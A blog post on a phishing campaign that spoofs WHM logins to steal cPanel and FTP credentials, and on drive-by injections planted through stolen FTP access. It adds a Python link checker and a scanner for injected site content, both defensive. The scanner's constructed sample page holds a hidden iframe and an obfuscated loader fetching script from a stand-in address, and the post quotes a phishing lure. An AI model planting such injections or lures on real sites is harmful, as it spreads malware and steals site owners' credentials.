Brian Krebs at The Washington Post is reporting that scam artists have launched a massive email attack to trick cPanel users into giving up their access details. Major providers such as HostGator, Yahoo, and 50Webs, as well as some 90 other hosting providers, have been targeted. Security experts report that the attackers are attempting to build a botnet to further distribute malicious code. A few of our cPanel server management clients have been targeted, but we have their systems locked down.
Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, has collected several of these web host targeted emails. They all carry a similar message asking you to confirm your FTP login details due to system maintenance.
Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details. Please confirm your FTP details by using the link below:
When the link is followed, it takes you to an attacker-controlled web site designed to spoof a WHM login.
Once you enter your details, the attackers have your login and can use it to compromise your account.
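The phishing message above works because the visible link text and the real destination differ, and because the destination is not under the hosting provider's domain at all. The following added example (not from the original post, and not a tool from any of the providers named) shows the two checks a mail filter or a cautious administrator can apply to an HTML email body: does each link actually point at a host under the provider's domain, and does the text it displays agree with where it goes? The email body, the provider domain `example-host.com` and the address `198.51.100.23` are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkExtractor(HTMLParser):
    """Collects (href, visible text) pairs from the anchors in an HTML email body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Return the lowercase hostname of a URL, tolerating a missing scheme."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()


def same_org(host, trusted_domain):
    """True when host is the trusted domain itself or one of its subdomains."""
    return host == trusted_domain or host.endswith("." + trusted_domain)


def suspicious_links(html_body, trusted_domain):
    """Flag links whose target is outside trusted_domain or whose displayed
    hostname disagrees with the hostname they actually point to."""
    parser = LinkExtractor()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        href_host = host_of(href)
        reasons = []
        if not same_org(href_host, trusted_domain):
            reasons.append("link host %r is not under %s" % (href_host, trusted_domain))
        # Only treat the anchor text as a URL when it looks like one (no spaces, has a dot).
        text_host = host_of(text) if "." in text and " " not in text else ""
        if text_host and text_host != href_host:
            reasons.append("displays %r but points to %r" % (text_host, href_host))
        if reasons:
            findings.append((href, reasons))
    return findings


# Constructed sample modelled on the "confirm your FTP details" lure; the IP is a
# documentation address and example-host.com stands in for the real provider.
SAMPLE_EMAIL = """<p>Due to the system maintenance, we kindly ask you to take a few
minutes to confirm your FTP details. Please confirm your FTP details by using the link below:</p>
<p><a href="http://198.51.100.23/whm/login.php">https://whm.example-host.com:2087/</a></p>
<p><a href="https://support.example-host.com/kb">Help</a></p>
"""

if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_EMAIL, "example-host.com"):
        print(href)
        for reason in reasons:
            print("  -", reason)
```

Running it reports only the first link, with both reasons: the target `198.51.100.23` is not under `example-host.com`, and the anchor text claims a WHM address that the href does not go to. The support link passes because its host is a subdomain of the provider.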
Earlier this year, we investigated several FTP-based attacks against web sites. In those attacks, an end user's FTP details were stolen by viruses on their desktop computer systems. The attackers then used the FTP credentials to place scripts into the web sites. These drive-by web attacks reached epidemic proportions this summer. A drive-by web attack is one where an attacker inserts redirects or other code into a site such that the exploit is triggered simply by visiting it. If you lack anti-malware tools or have not patched your system, your desktop computer may be exploited.
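Because the injected code in these attacks lands in the site's own files via stolen FTP credentials, a site owner can catch it by scanning the document root for the usual markers: zero-sized or hidden iframes, script tags that load from hosts the site does not use, and `document.write(unescape(...))` style obfuscation. The scanner below is an added example, not code from the original post or from any of the providers named; its patterns are heuristics, the allowlist of script hosts is something the site owner supplies, and the two sample pages and the address `203.0.113.77` are constructed for the example.

```python
import os
import re
from urllib.parse import urlparse

# Heuristic markers for injected drive-by content. Not exhaustive: they catch the
# common shapes described in the text, and a clean hit list is not proof of a clean site.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:width\s*=\s*[\"']?0|height\s*=\s*[\"']?0"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>",
    re.IGNORECASE,
)
EXTERNAL_SCRIPT = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
OBFUSCATED_JS = re.compile(
    r"(?:document\.write|eval)\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}",
    re.IGNORECASE,
)

SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js")


def scan_content(text, allowed_hosts):
    """Return (line number, description) for each suspicious marker found in text.
    allowed_hosts is the set of hosts the site legitimately loads scripts from;
    relative script paths are treated as local and ignored."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if HIDDEN_IFRAME.search(line):
            findings.append((lineno, "hidden iframe"))
        for match in EXTERNAL_SCRIPT.finditer(line):
            host = (urlparse(match.group(1)).hostname or "").lower()
            if host and host not in allowed_hosts:
                findings.append((lineno, "external script from %s" % host))
        if OBFUSCATED_JS.search(line):
            findings.append((lineno, "obfuscated javascript"))
    return findings


def scan_directory(root, allowed_hosts):
    """Walk a document root and return {path: findings} for files with hits."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as handle:
                hits = scan_content(handle.read(), allowed_hosts)
            if hits:
                report[path] = hits
    return report


# Constructed sample pages: one untouched, one carrying a typical injection.
CLEAN_PAGE = """<html><head><title>Welcome</title>
<script src="/js/site.js"></script>
<script src="https://cdn.example-site.com/jquery.js"></script>
</head><body><h1>Hello</h1></body></html>
"""

INJECTED_PAGE = """<html><head><title>Welcome</title>
<script src="/js/site.js"></script>
</head><body><h1>Hello</h1>
<iframe src="http://203.0.113.77/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.77%2Fx.js%22%3E%3C%2Fscript%3E'))</script>
<script src="http://203.0.113.77/x.js"></script>
</body></html>
"""

if __name__ == "__main__":
    allowed = {"cdn.example-site.com"}
    print("clean page:", scan_content(CLEAN_PAGE, allowed))
    print("injected page:", scan_content(INJECTED_PAGE, allowed))
```

On the constructed pages the clean one produces no findings, while the injected one reports the hidden iframe on line 4, the `document.write(unescape(...))` loader on line 5 and the script pulled from `203.0.113.77` on line 6. Run `scan_directory` against a copy of the document root after any FTP credential exposure, and compare its output across runs so that newly appearing hits stand out.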
The consequence of these exploits is that your site can get flagged by Google or others as dangerous. As a result, visitors will see a warning page before continuing to your site. I’ve written before about how to remove the “this site may harm your computer” warning once you clean up the underlying issues.
In a white paper, Drive-by Downloads. The Web Under Siege, Ryan Naraine outlines the method of the attack and how it has been spreading. His conclusion was nothing unfamiliar: use a patch management solution that assists with finding and fixing all software on your system. Secunia offers a tool called Personal Software Inspector which can do just this.